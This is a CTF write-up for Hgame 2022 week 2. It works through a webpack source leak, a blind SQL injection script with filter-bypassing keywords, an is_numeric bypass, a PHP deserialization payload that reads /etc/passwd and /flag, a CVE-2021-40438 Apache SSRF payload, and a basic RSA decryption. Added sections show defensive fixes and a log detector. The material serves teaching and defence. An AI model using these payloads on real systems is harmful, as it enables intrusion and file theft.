Hgame2022-Week2

This week I mainly worked on web, then did one misc; by the time that was done new challenges had already been released, which was a bit awkward.


Week2

WEB

webpack-engine

Going by the hint in the challenge name, webpack, I looked up the vulnerabilities that commonly show up with it.

Most of the advisories turn out to be about leaked API endpoints. My original plan was to decode the obfuscated JS to recover the endpoint information, but the vulnerability details showed that the source can be viewed directly in the browser's Sources panel.

There the encoded flag is visible; a base64 decode gives the flag.

Pokemon

Opening the page, the hint says to pass ?id=1

My guess was that this tests SQL injection, but the id parameter did not react to any testing; instead, the error page turned out to have a problem.

It has a code parameter, and changing the value of code produces an error message.

So the injection point should be code; an XOR construction worked.

Testing the key characters showed that the challenge replaces them with the empty string, which can be bypassed by double-writing them; it also entity-encodes the special characters > < = and so on.

We use strcmp in place of the comparison operators and build a blind-injection payload:

404^(strcmp((selselectect/*/**/*/ascii(substr(database(),1,1))),1))

and judge the result by the data the page returns.

When the page comes back with the 404 content, the payload's comparison succeeded; the script is written on that basis.

import requests

url = "http://121.43.141.153:60056/error.php?code="
# database: pokemon
# table: errors, fllllllllaaaaaag
# columns
result = ''
for j in range(1, 50):            # j: position of the character being extracted
    for i in range(1, 150):       # i: candidate ASCII code for that position
        # Keywords are double-written ("selselectect", "frfromom", ...) so that the
        # single-pass replace-with-empty filter rebuilds them; "/*/**/*/" collapses
        # to "/**/" and stands in for a space.
        payload1 = "404^(strcmp((selselectect/*/**/*/ascii(substr(database(),{},1))),{}))".format(j, i)
        payload2 = "404^(strcmp((selselectect/*/**/*/ascii(substr((seselectlect(group_concat(table_name))frfromom(infoorrmation_schema.tables)whwhereere(table_schema)in(database())),{},1))),{}))".format(j, i)
        payload3 = "404^(strcmp((selselectect/*/**/*/ascii(substr((seselectlect(group_concat(column_name))frfromom(infoorrmation_schema.columns)whwhereere(table_schema)in(database())),{},1))),{}))".format(j, i)
        payload4 = "404^(strcmp((seselectlect/*/**/*/ascii(substr((seselectlect(group_concat(flag))frfromom(fllllllllaaaaaag)),{},1))),{}))".format(j, i)
        # Stage 1 uses payload1 (database name), 2 the tables, 3 the columns, 4 the flag
        response = requests.get(url + payload4).text
        if "Pokemon" in response:   # strcmp(...) == 0, so 404^0 == 404: the guess matched
            result += chr(i)
            print(result)
            break

Dumping the database:

[screenshot]

Dumping the flag:

[screenshot]

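As an added illustration (my own code, not part of the original writeup or the challenge), the Python below models the delete-and-encode filter inferred from the payload, shows why the double-written tokens survive it, and gives the fix: an allowlist check plus a bound query parameter. The blacklist, the SQLite errors table and the sample inputs are constructed.

```python
import sqlite3

# Constructed model of the challenge's filter, inferred from the payload: each
# blacklisted token is deleted in a single pass (hence "selselectect",
# "frfromom", "infoorrmation" and "/*/**/*/" in the payload), and < > = are
# entity-encoded so they cannot be used as comparison operators.
BLACKLIST = ["select", "from", "where", "or", "/**/", " "]

def strip_filter(value: str) -> str:
    """Single-pass delete-and-encode 'sanitizer' modelled on the challenge."""
    for token in BLACKLIST:
        value = value.replace(token, "")
    return (value.replace("<", "&lt;").replace(">", "&gt;")
                 .replace("=", "&#61;"))

def build_demo_db() -> sqlite3.Connection:
    """Constructed errors table standing in for the challenge's database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE errors (code INTEGER, message TEXT)")
    conn.executemany("INSERT INTO errors VALUES (?, ?)",
                     [(404, "Pokemon not found"), (500, "server error")])
    return conn

def lookup_vulnerable(conn: sqlite3.Connection, code: str):
    """Filter, then concatenate: the pattern the double-written payload defeats."""
    sql = "SELECT message FROM errors WHERE code = " + strip_filter(code)
    row = conn.execute(sql).fetchone()
    return row[0] if row else None

def lookup_fixed(conn: sqlite3.Connection, code: str):
    """Allowlist the shape (an error code is all digits) and bind the value as a
    query parameter, so the input is data and never SQL; no blacklist needed."""
    if not code.isdigit():
        return None
    row = conn.execute("SELECT message FROM errors WHERE code = ?",
                       (int(code),)).fetchone()
    return row[0] if row else None
```

With the vulnerable lookup, a doubled "oorr" collapses to "or" and the injected condition decides which row comes back, which is exactly the oracle the blind script above relies on; the fixed lookup returns nothing for the same input.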
一本单词书 (A Vocabulary Book)

The hint points to a source leak; download the archive and unzip it to take a look.

First check ping.php, the file most likely to contain a command execution.

It can be ruled out straight away.

Next look at admin_check.php.

That file mainly checks the login state, so following the trail back to login.php, here is part of the core code.

This code validates the login, and from it we can work out:

username=adm1n
password=1080

But the challenge validates the password we send and does not allow a purely numeric value, so is_numeric() has to be bypassed.

A quick search on Baidu shows the function can be bypassed with hexadecimal or with %00; %00 is used here.

username=adm1n&password=1080%00a

The 302 redirect proves the login succeeded, but when the page is loaded again Chrome shows a security warning that stops us from going further.

At this point open

chrome://net-internals/#hsts

delete the challenge site's domain there, and the page can be visited again.

After logging in we land on this page.

Analysing the source, starting with index.php, the page's data handling is in get.php and save.php.

save.php

<?php
session_start();
include 'admin_check.php';

function encode($data): string {
    $result = '';
    foreach ($data as $k => $v) {
        $result .= $k . '|' . serialize($v);
    }

    return $result;
}

function saveSessionData() {
    $filename = "/tmp/".$_SESSION['unique_key'].'.session';
    $data = json_decode(file_get_contents("php://input"));
    $str = encode($data);
    file_put_contents($filename, $str, FILE_APPEND);
}

if ($_SERVER['REQUEST_METHOD'] == 'POST') {
    saveSessionData();
} else {
    echo 'method not allowed';
}

Two functions matter. encode is straightforward: it serializes our data for storage. saveSessionData reads the request body and calls encode to write the result to a fixed location; the file is named after the key generated at login. Debugging what comes out of encode:

The value we sent is stored serialized. Next, get.php.

get.php

<?php
session_start();
include 'admin_check.php';
include 'evil.php';

// flag is in /flag

function decode(string $data): Array {
    $result = [];
    $offset = 0;
    $length = \strlen($data);
    while ($offset < $length) {
        if (!strstr(substr($data, $offset), '|')) {
            return [];
        }
        $pos = strpos($data, '|', $offset);
        $num = $pos - $offset;
        $varname = substr($data, $offset, $num);
        $offset += $num + 1;
        $dataItem = unserialize(substr($data, $offset));

        $result[$varname] = $dataItem;
        $offset += \strlen(serialize($dataItem));
    }
    return $result;
}

function loadSessionData(): Array {
    $filename = '/tmp/'.$_SESSION['unique_key'].'.session';
    if (file_exists($filename)) {
        $str = file_get_contents($filename);
        return decode($str);
    } else {
        file_put_contents($filename, '');
        return [];
    }
}

echo json_encode(loadSessionData());

First, the file tells us where the flag is. Then the two functions: decode unserializes the stored data and returns it, the counterpart of encode in save.php. encode joins key and value with "|", while decode uses "|" to find the boundary and unserializes whatever follows it. That is the problem: by putting a "|" inside the data we send, we control what decode's unserialize call processes. evil.php, meanwhile, contains the point that reads the flag.

It uses file_get_contents, so we can generate a payload from evil.php and trigger it through get.php. Build the payload and try reading a file:

<?php

class Evil {
    public $file="/etc/passwd";
    public $flag="flag{}";

}

$data=new Evil();
echo serialize($data);
//O:4:"Evil":2:{s:4:"file";s:11:"/etc/passwd";s:4:"flag";s:6:"flag{}";}

One thing to watch when sending the data: if the payload is placed in the value, save.php serializes it (it becomes an ordinary string), so the payload has to go in the key.

{"1|O:4:\"Evil\":2:{s:4:\"file\";s:11:\"/etc/passwd\";s:4:\"flag\";s:6:\"flag{}\";}":"123"}

Request get.php.

The data comes back, so change the file being read to /flag and the flag is returned:

{"1|O:4:\"Evil\":2:{s:4:\"file\";s:5:\"/flag\";s:4:\"flag\";s:6:\"flag{}\";}":"123"}


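To make the framing bug concrete, here is an added Python model of save.php's encode() and get.php's decode() (my own code, not the challenge's; the PHP serialize/unserialize subset is a constructed stand-in for ASCII strings and ints), followed by a JSON-based replacement in which a "|" in a key is just a character and nothing is ever unserialized.

```python
import json
import re

# Constructed stand-in for PHP's serialize()/unserialize(), covering only the
# ASCII strings and ints this demo needs; it is not the real PHP implementation.
def php_serialize(v):
    return f"i:{v};" if isinstance(v, int) else f's:{len(v)}:"{v}";'

_ITEM = re.compile(r'i:(-?\d+);|s:(\d+):"')

def php_unserialize_prefix(data: str):
    """Parse the leading serialized item and return (value, chars consumed).
    Like PHP's unserialize(), whatever follows the item is ignored."""
    m = _ITEM.match(data)
    if not m:
        raise ValueError("malformed serialized data")
    if m.group(1) is not None:
        return int(m.group(1)), m.end()
    n = int(m.group(2))
    end = m.end() + n
    if data[end:end + 2] != '";':
        raise ValueError("malformed serialized string")
    return data[m.end():end], end + 2

def encode(items: dict) -> str:
    """Mirror of save.php: key . '|' . serialize(value); the key is not escaped."""
    return "".join(f"{k}|{php_serialize(v)}" for k, v in items.items())

def decode(data: str) -> dict:
    """Mirror of get.php's decode(): split on '|', unserialize what follows."""
    result, offset = {}, 0
    while offset < len(data):
        pos = data.find("|", offset)
        if pos < 0:
            return {}
        name = data[offset:pos]
        value, used = php_unserialize_prefix(data[pos + 1:])
        result[name] = value          # a '|' in the key shifts the boundary left
        offset = pos + 1 + used
    return result

def encode_safe(items: dict) -> str:
    """Fix: one JSON document; keys and values are both escaped by the format,
    so a '|' in a key is just a character, and nothing is ever unserialized."""
    return json.dumps(items)

def decode_safe(data: str) -> dict:
    return json.loads(data) if data else {}
```

With the original framing, a key of 1|s:5:"/flag"; makes decode() unserialize attacker-chosen bytes as the value of key "1"; in the challenge those bytes are the serialized Evil object, which is why the payload has to sit in the key.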
Apache!

The challenge says the flag is on the internal network and the normal service is down, so reaching the internal network requires a vulnerability in the middleware or the framework. The challenge clearly hints that an Apache vulnerability has to be used, so the approach is obvious.

An Apache vulnerability plus a need to attack the internal network: the first thing that comes to mind for internal access is SSRF, so the challenge should be about CVE-2021-40438.

Following the challenge hint, the request cannot be accessed; checking the page source reveals www.zip, so download it and take a look.

The files are the system's configuration; docker-compose.yml is the target's docker start-up file.

httpd.conf shows a module whose function is forwarding requests to Tomcat.

default.conf reveals the page that returns the flag, along with the proxy_pass.

httpd-vhosts.conf gives further information.

Build the payload again; the request has to go through the proxy:

/proxy?unix:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA|http://internal.host/flag

The flag is retrieved.

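From the defender's side, this added Python (not from the writeup or the challenge) scans Apache access-log lines for the request shape used above, unix:<padded socket path>|<url> inside a proxied target, and reports the client and the URL that would have been forwarded; the log lines are constructed.

```python
import re
from urllib.parse import unquote

# Apache common/combined log line: client, identity, user, [timestamp],
# "METHOD target PROTOCOL", status, size.
_LOG = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
                  r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) ')

# mod_proxy's Unix-domain-socket syntax is unix:<socket path>|<scheme>://<host>/...
# In the CVE-2021-40438 payload the socket path is padded until mod_proxy drops
# the unix: part, and the attacker-chosen URL after "|" is what gets fetched.
_UDS = re.compile(r'unix:(?P<sock>[^|]*)\|(?P<url>[a-z][a-z0-9+.-]*://[^\s"]*)',
                  re.IGNORECASE)

def inspect_request(line: str):
    """Return evidence for one log line if it carries a unix:...|url target."""
    m = _LOG.match(line)
    if not m:
        return None
    target = unquote(m.group("target"))   # "|" is usually logged as %7C
    u = _UDS.search(target)
    if not u:
        return None
    return {"ip": m.group("ip"), "status": int(m.group("status")),
            "socket_len": len(u.group("sock")), "forwarded_to": u.group("url")}

def find_ssrf_attempts(log_text: str) -> list:
    """Scan a whole access log and keep only the suspicious requests."""
    hits = (inspect_request(line) for line in log_text.splitlines())
    return [h for h in hits if h]

# Constructed sample log: one normal request and one padded unix: request
# shaped like the writeup's payload (a few thousand "A"s, then |http://...).
SAMPLE_LOG = (
    '10.0.0.5 - - [20/Jan/2022:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 512\n'
    '10.0.0.9 - - [20/Jan/2022:10:00:02 +0000] "GET /proxy?unix:' + "A" * 3000
    + '%7Chttp://internal.host/flag HTTP/1.1" 200 42\n'
)

if __name__ == "__main__":
    for hit in find_ssrf_attempts(SAMPLE_LOG):
        print(hit)
```

CVE-2021-40438 is fixed in Apache httpd 2.4.49, so upgrading is the durable mitigation; the scan is for finding attempts in existing logs.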
Crypto

RSA Attack

Basic RSA

Factor n to obtain p and q.

Script to recover the flag:

from Crypto.Util.number import *

e = 65537
n = 700612512827159827368074182577656505408114629807
c = 122622425510870177715177368049049966519567512708
# p and q obtained by factoring n
p = 715800347513314032483037
q = 978782023871716954857211
d = inverse(e, (p-1)*(q-1))   # private exponent: e*d == 1 mod phi(n)
m = pow(c, d, n)              # m = c^d mod n
print(long_to_bytes(m))
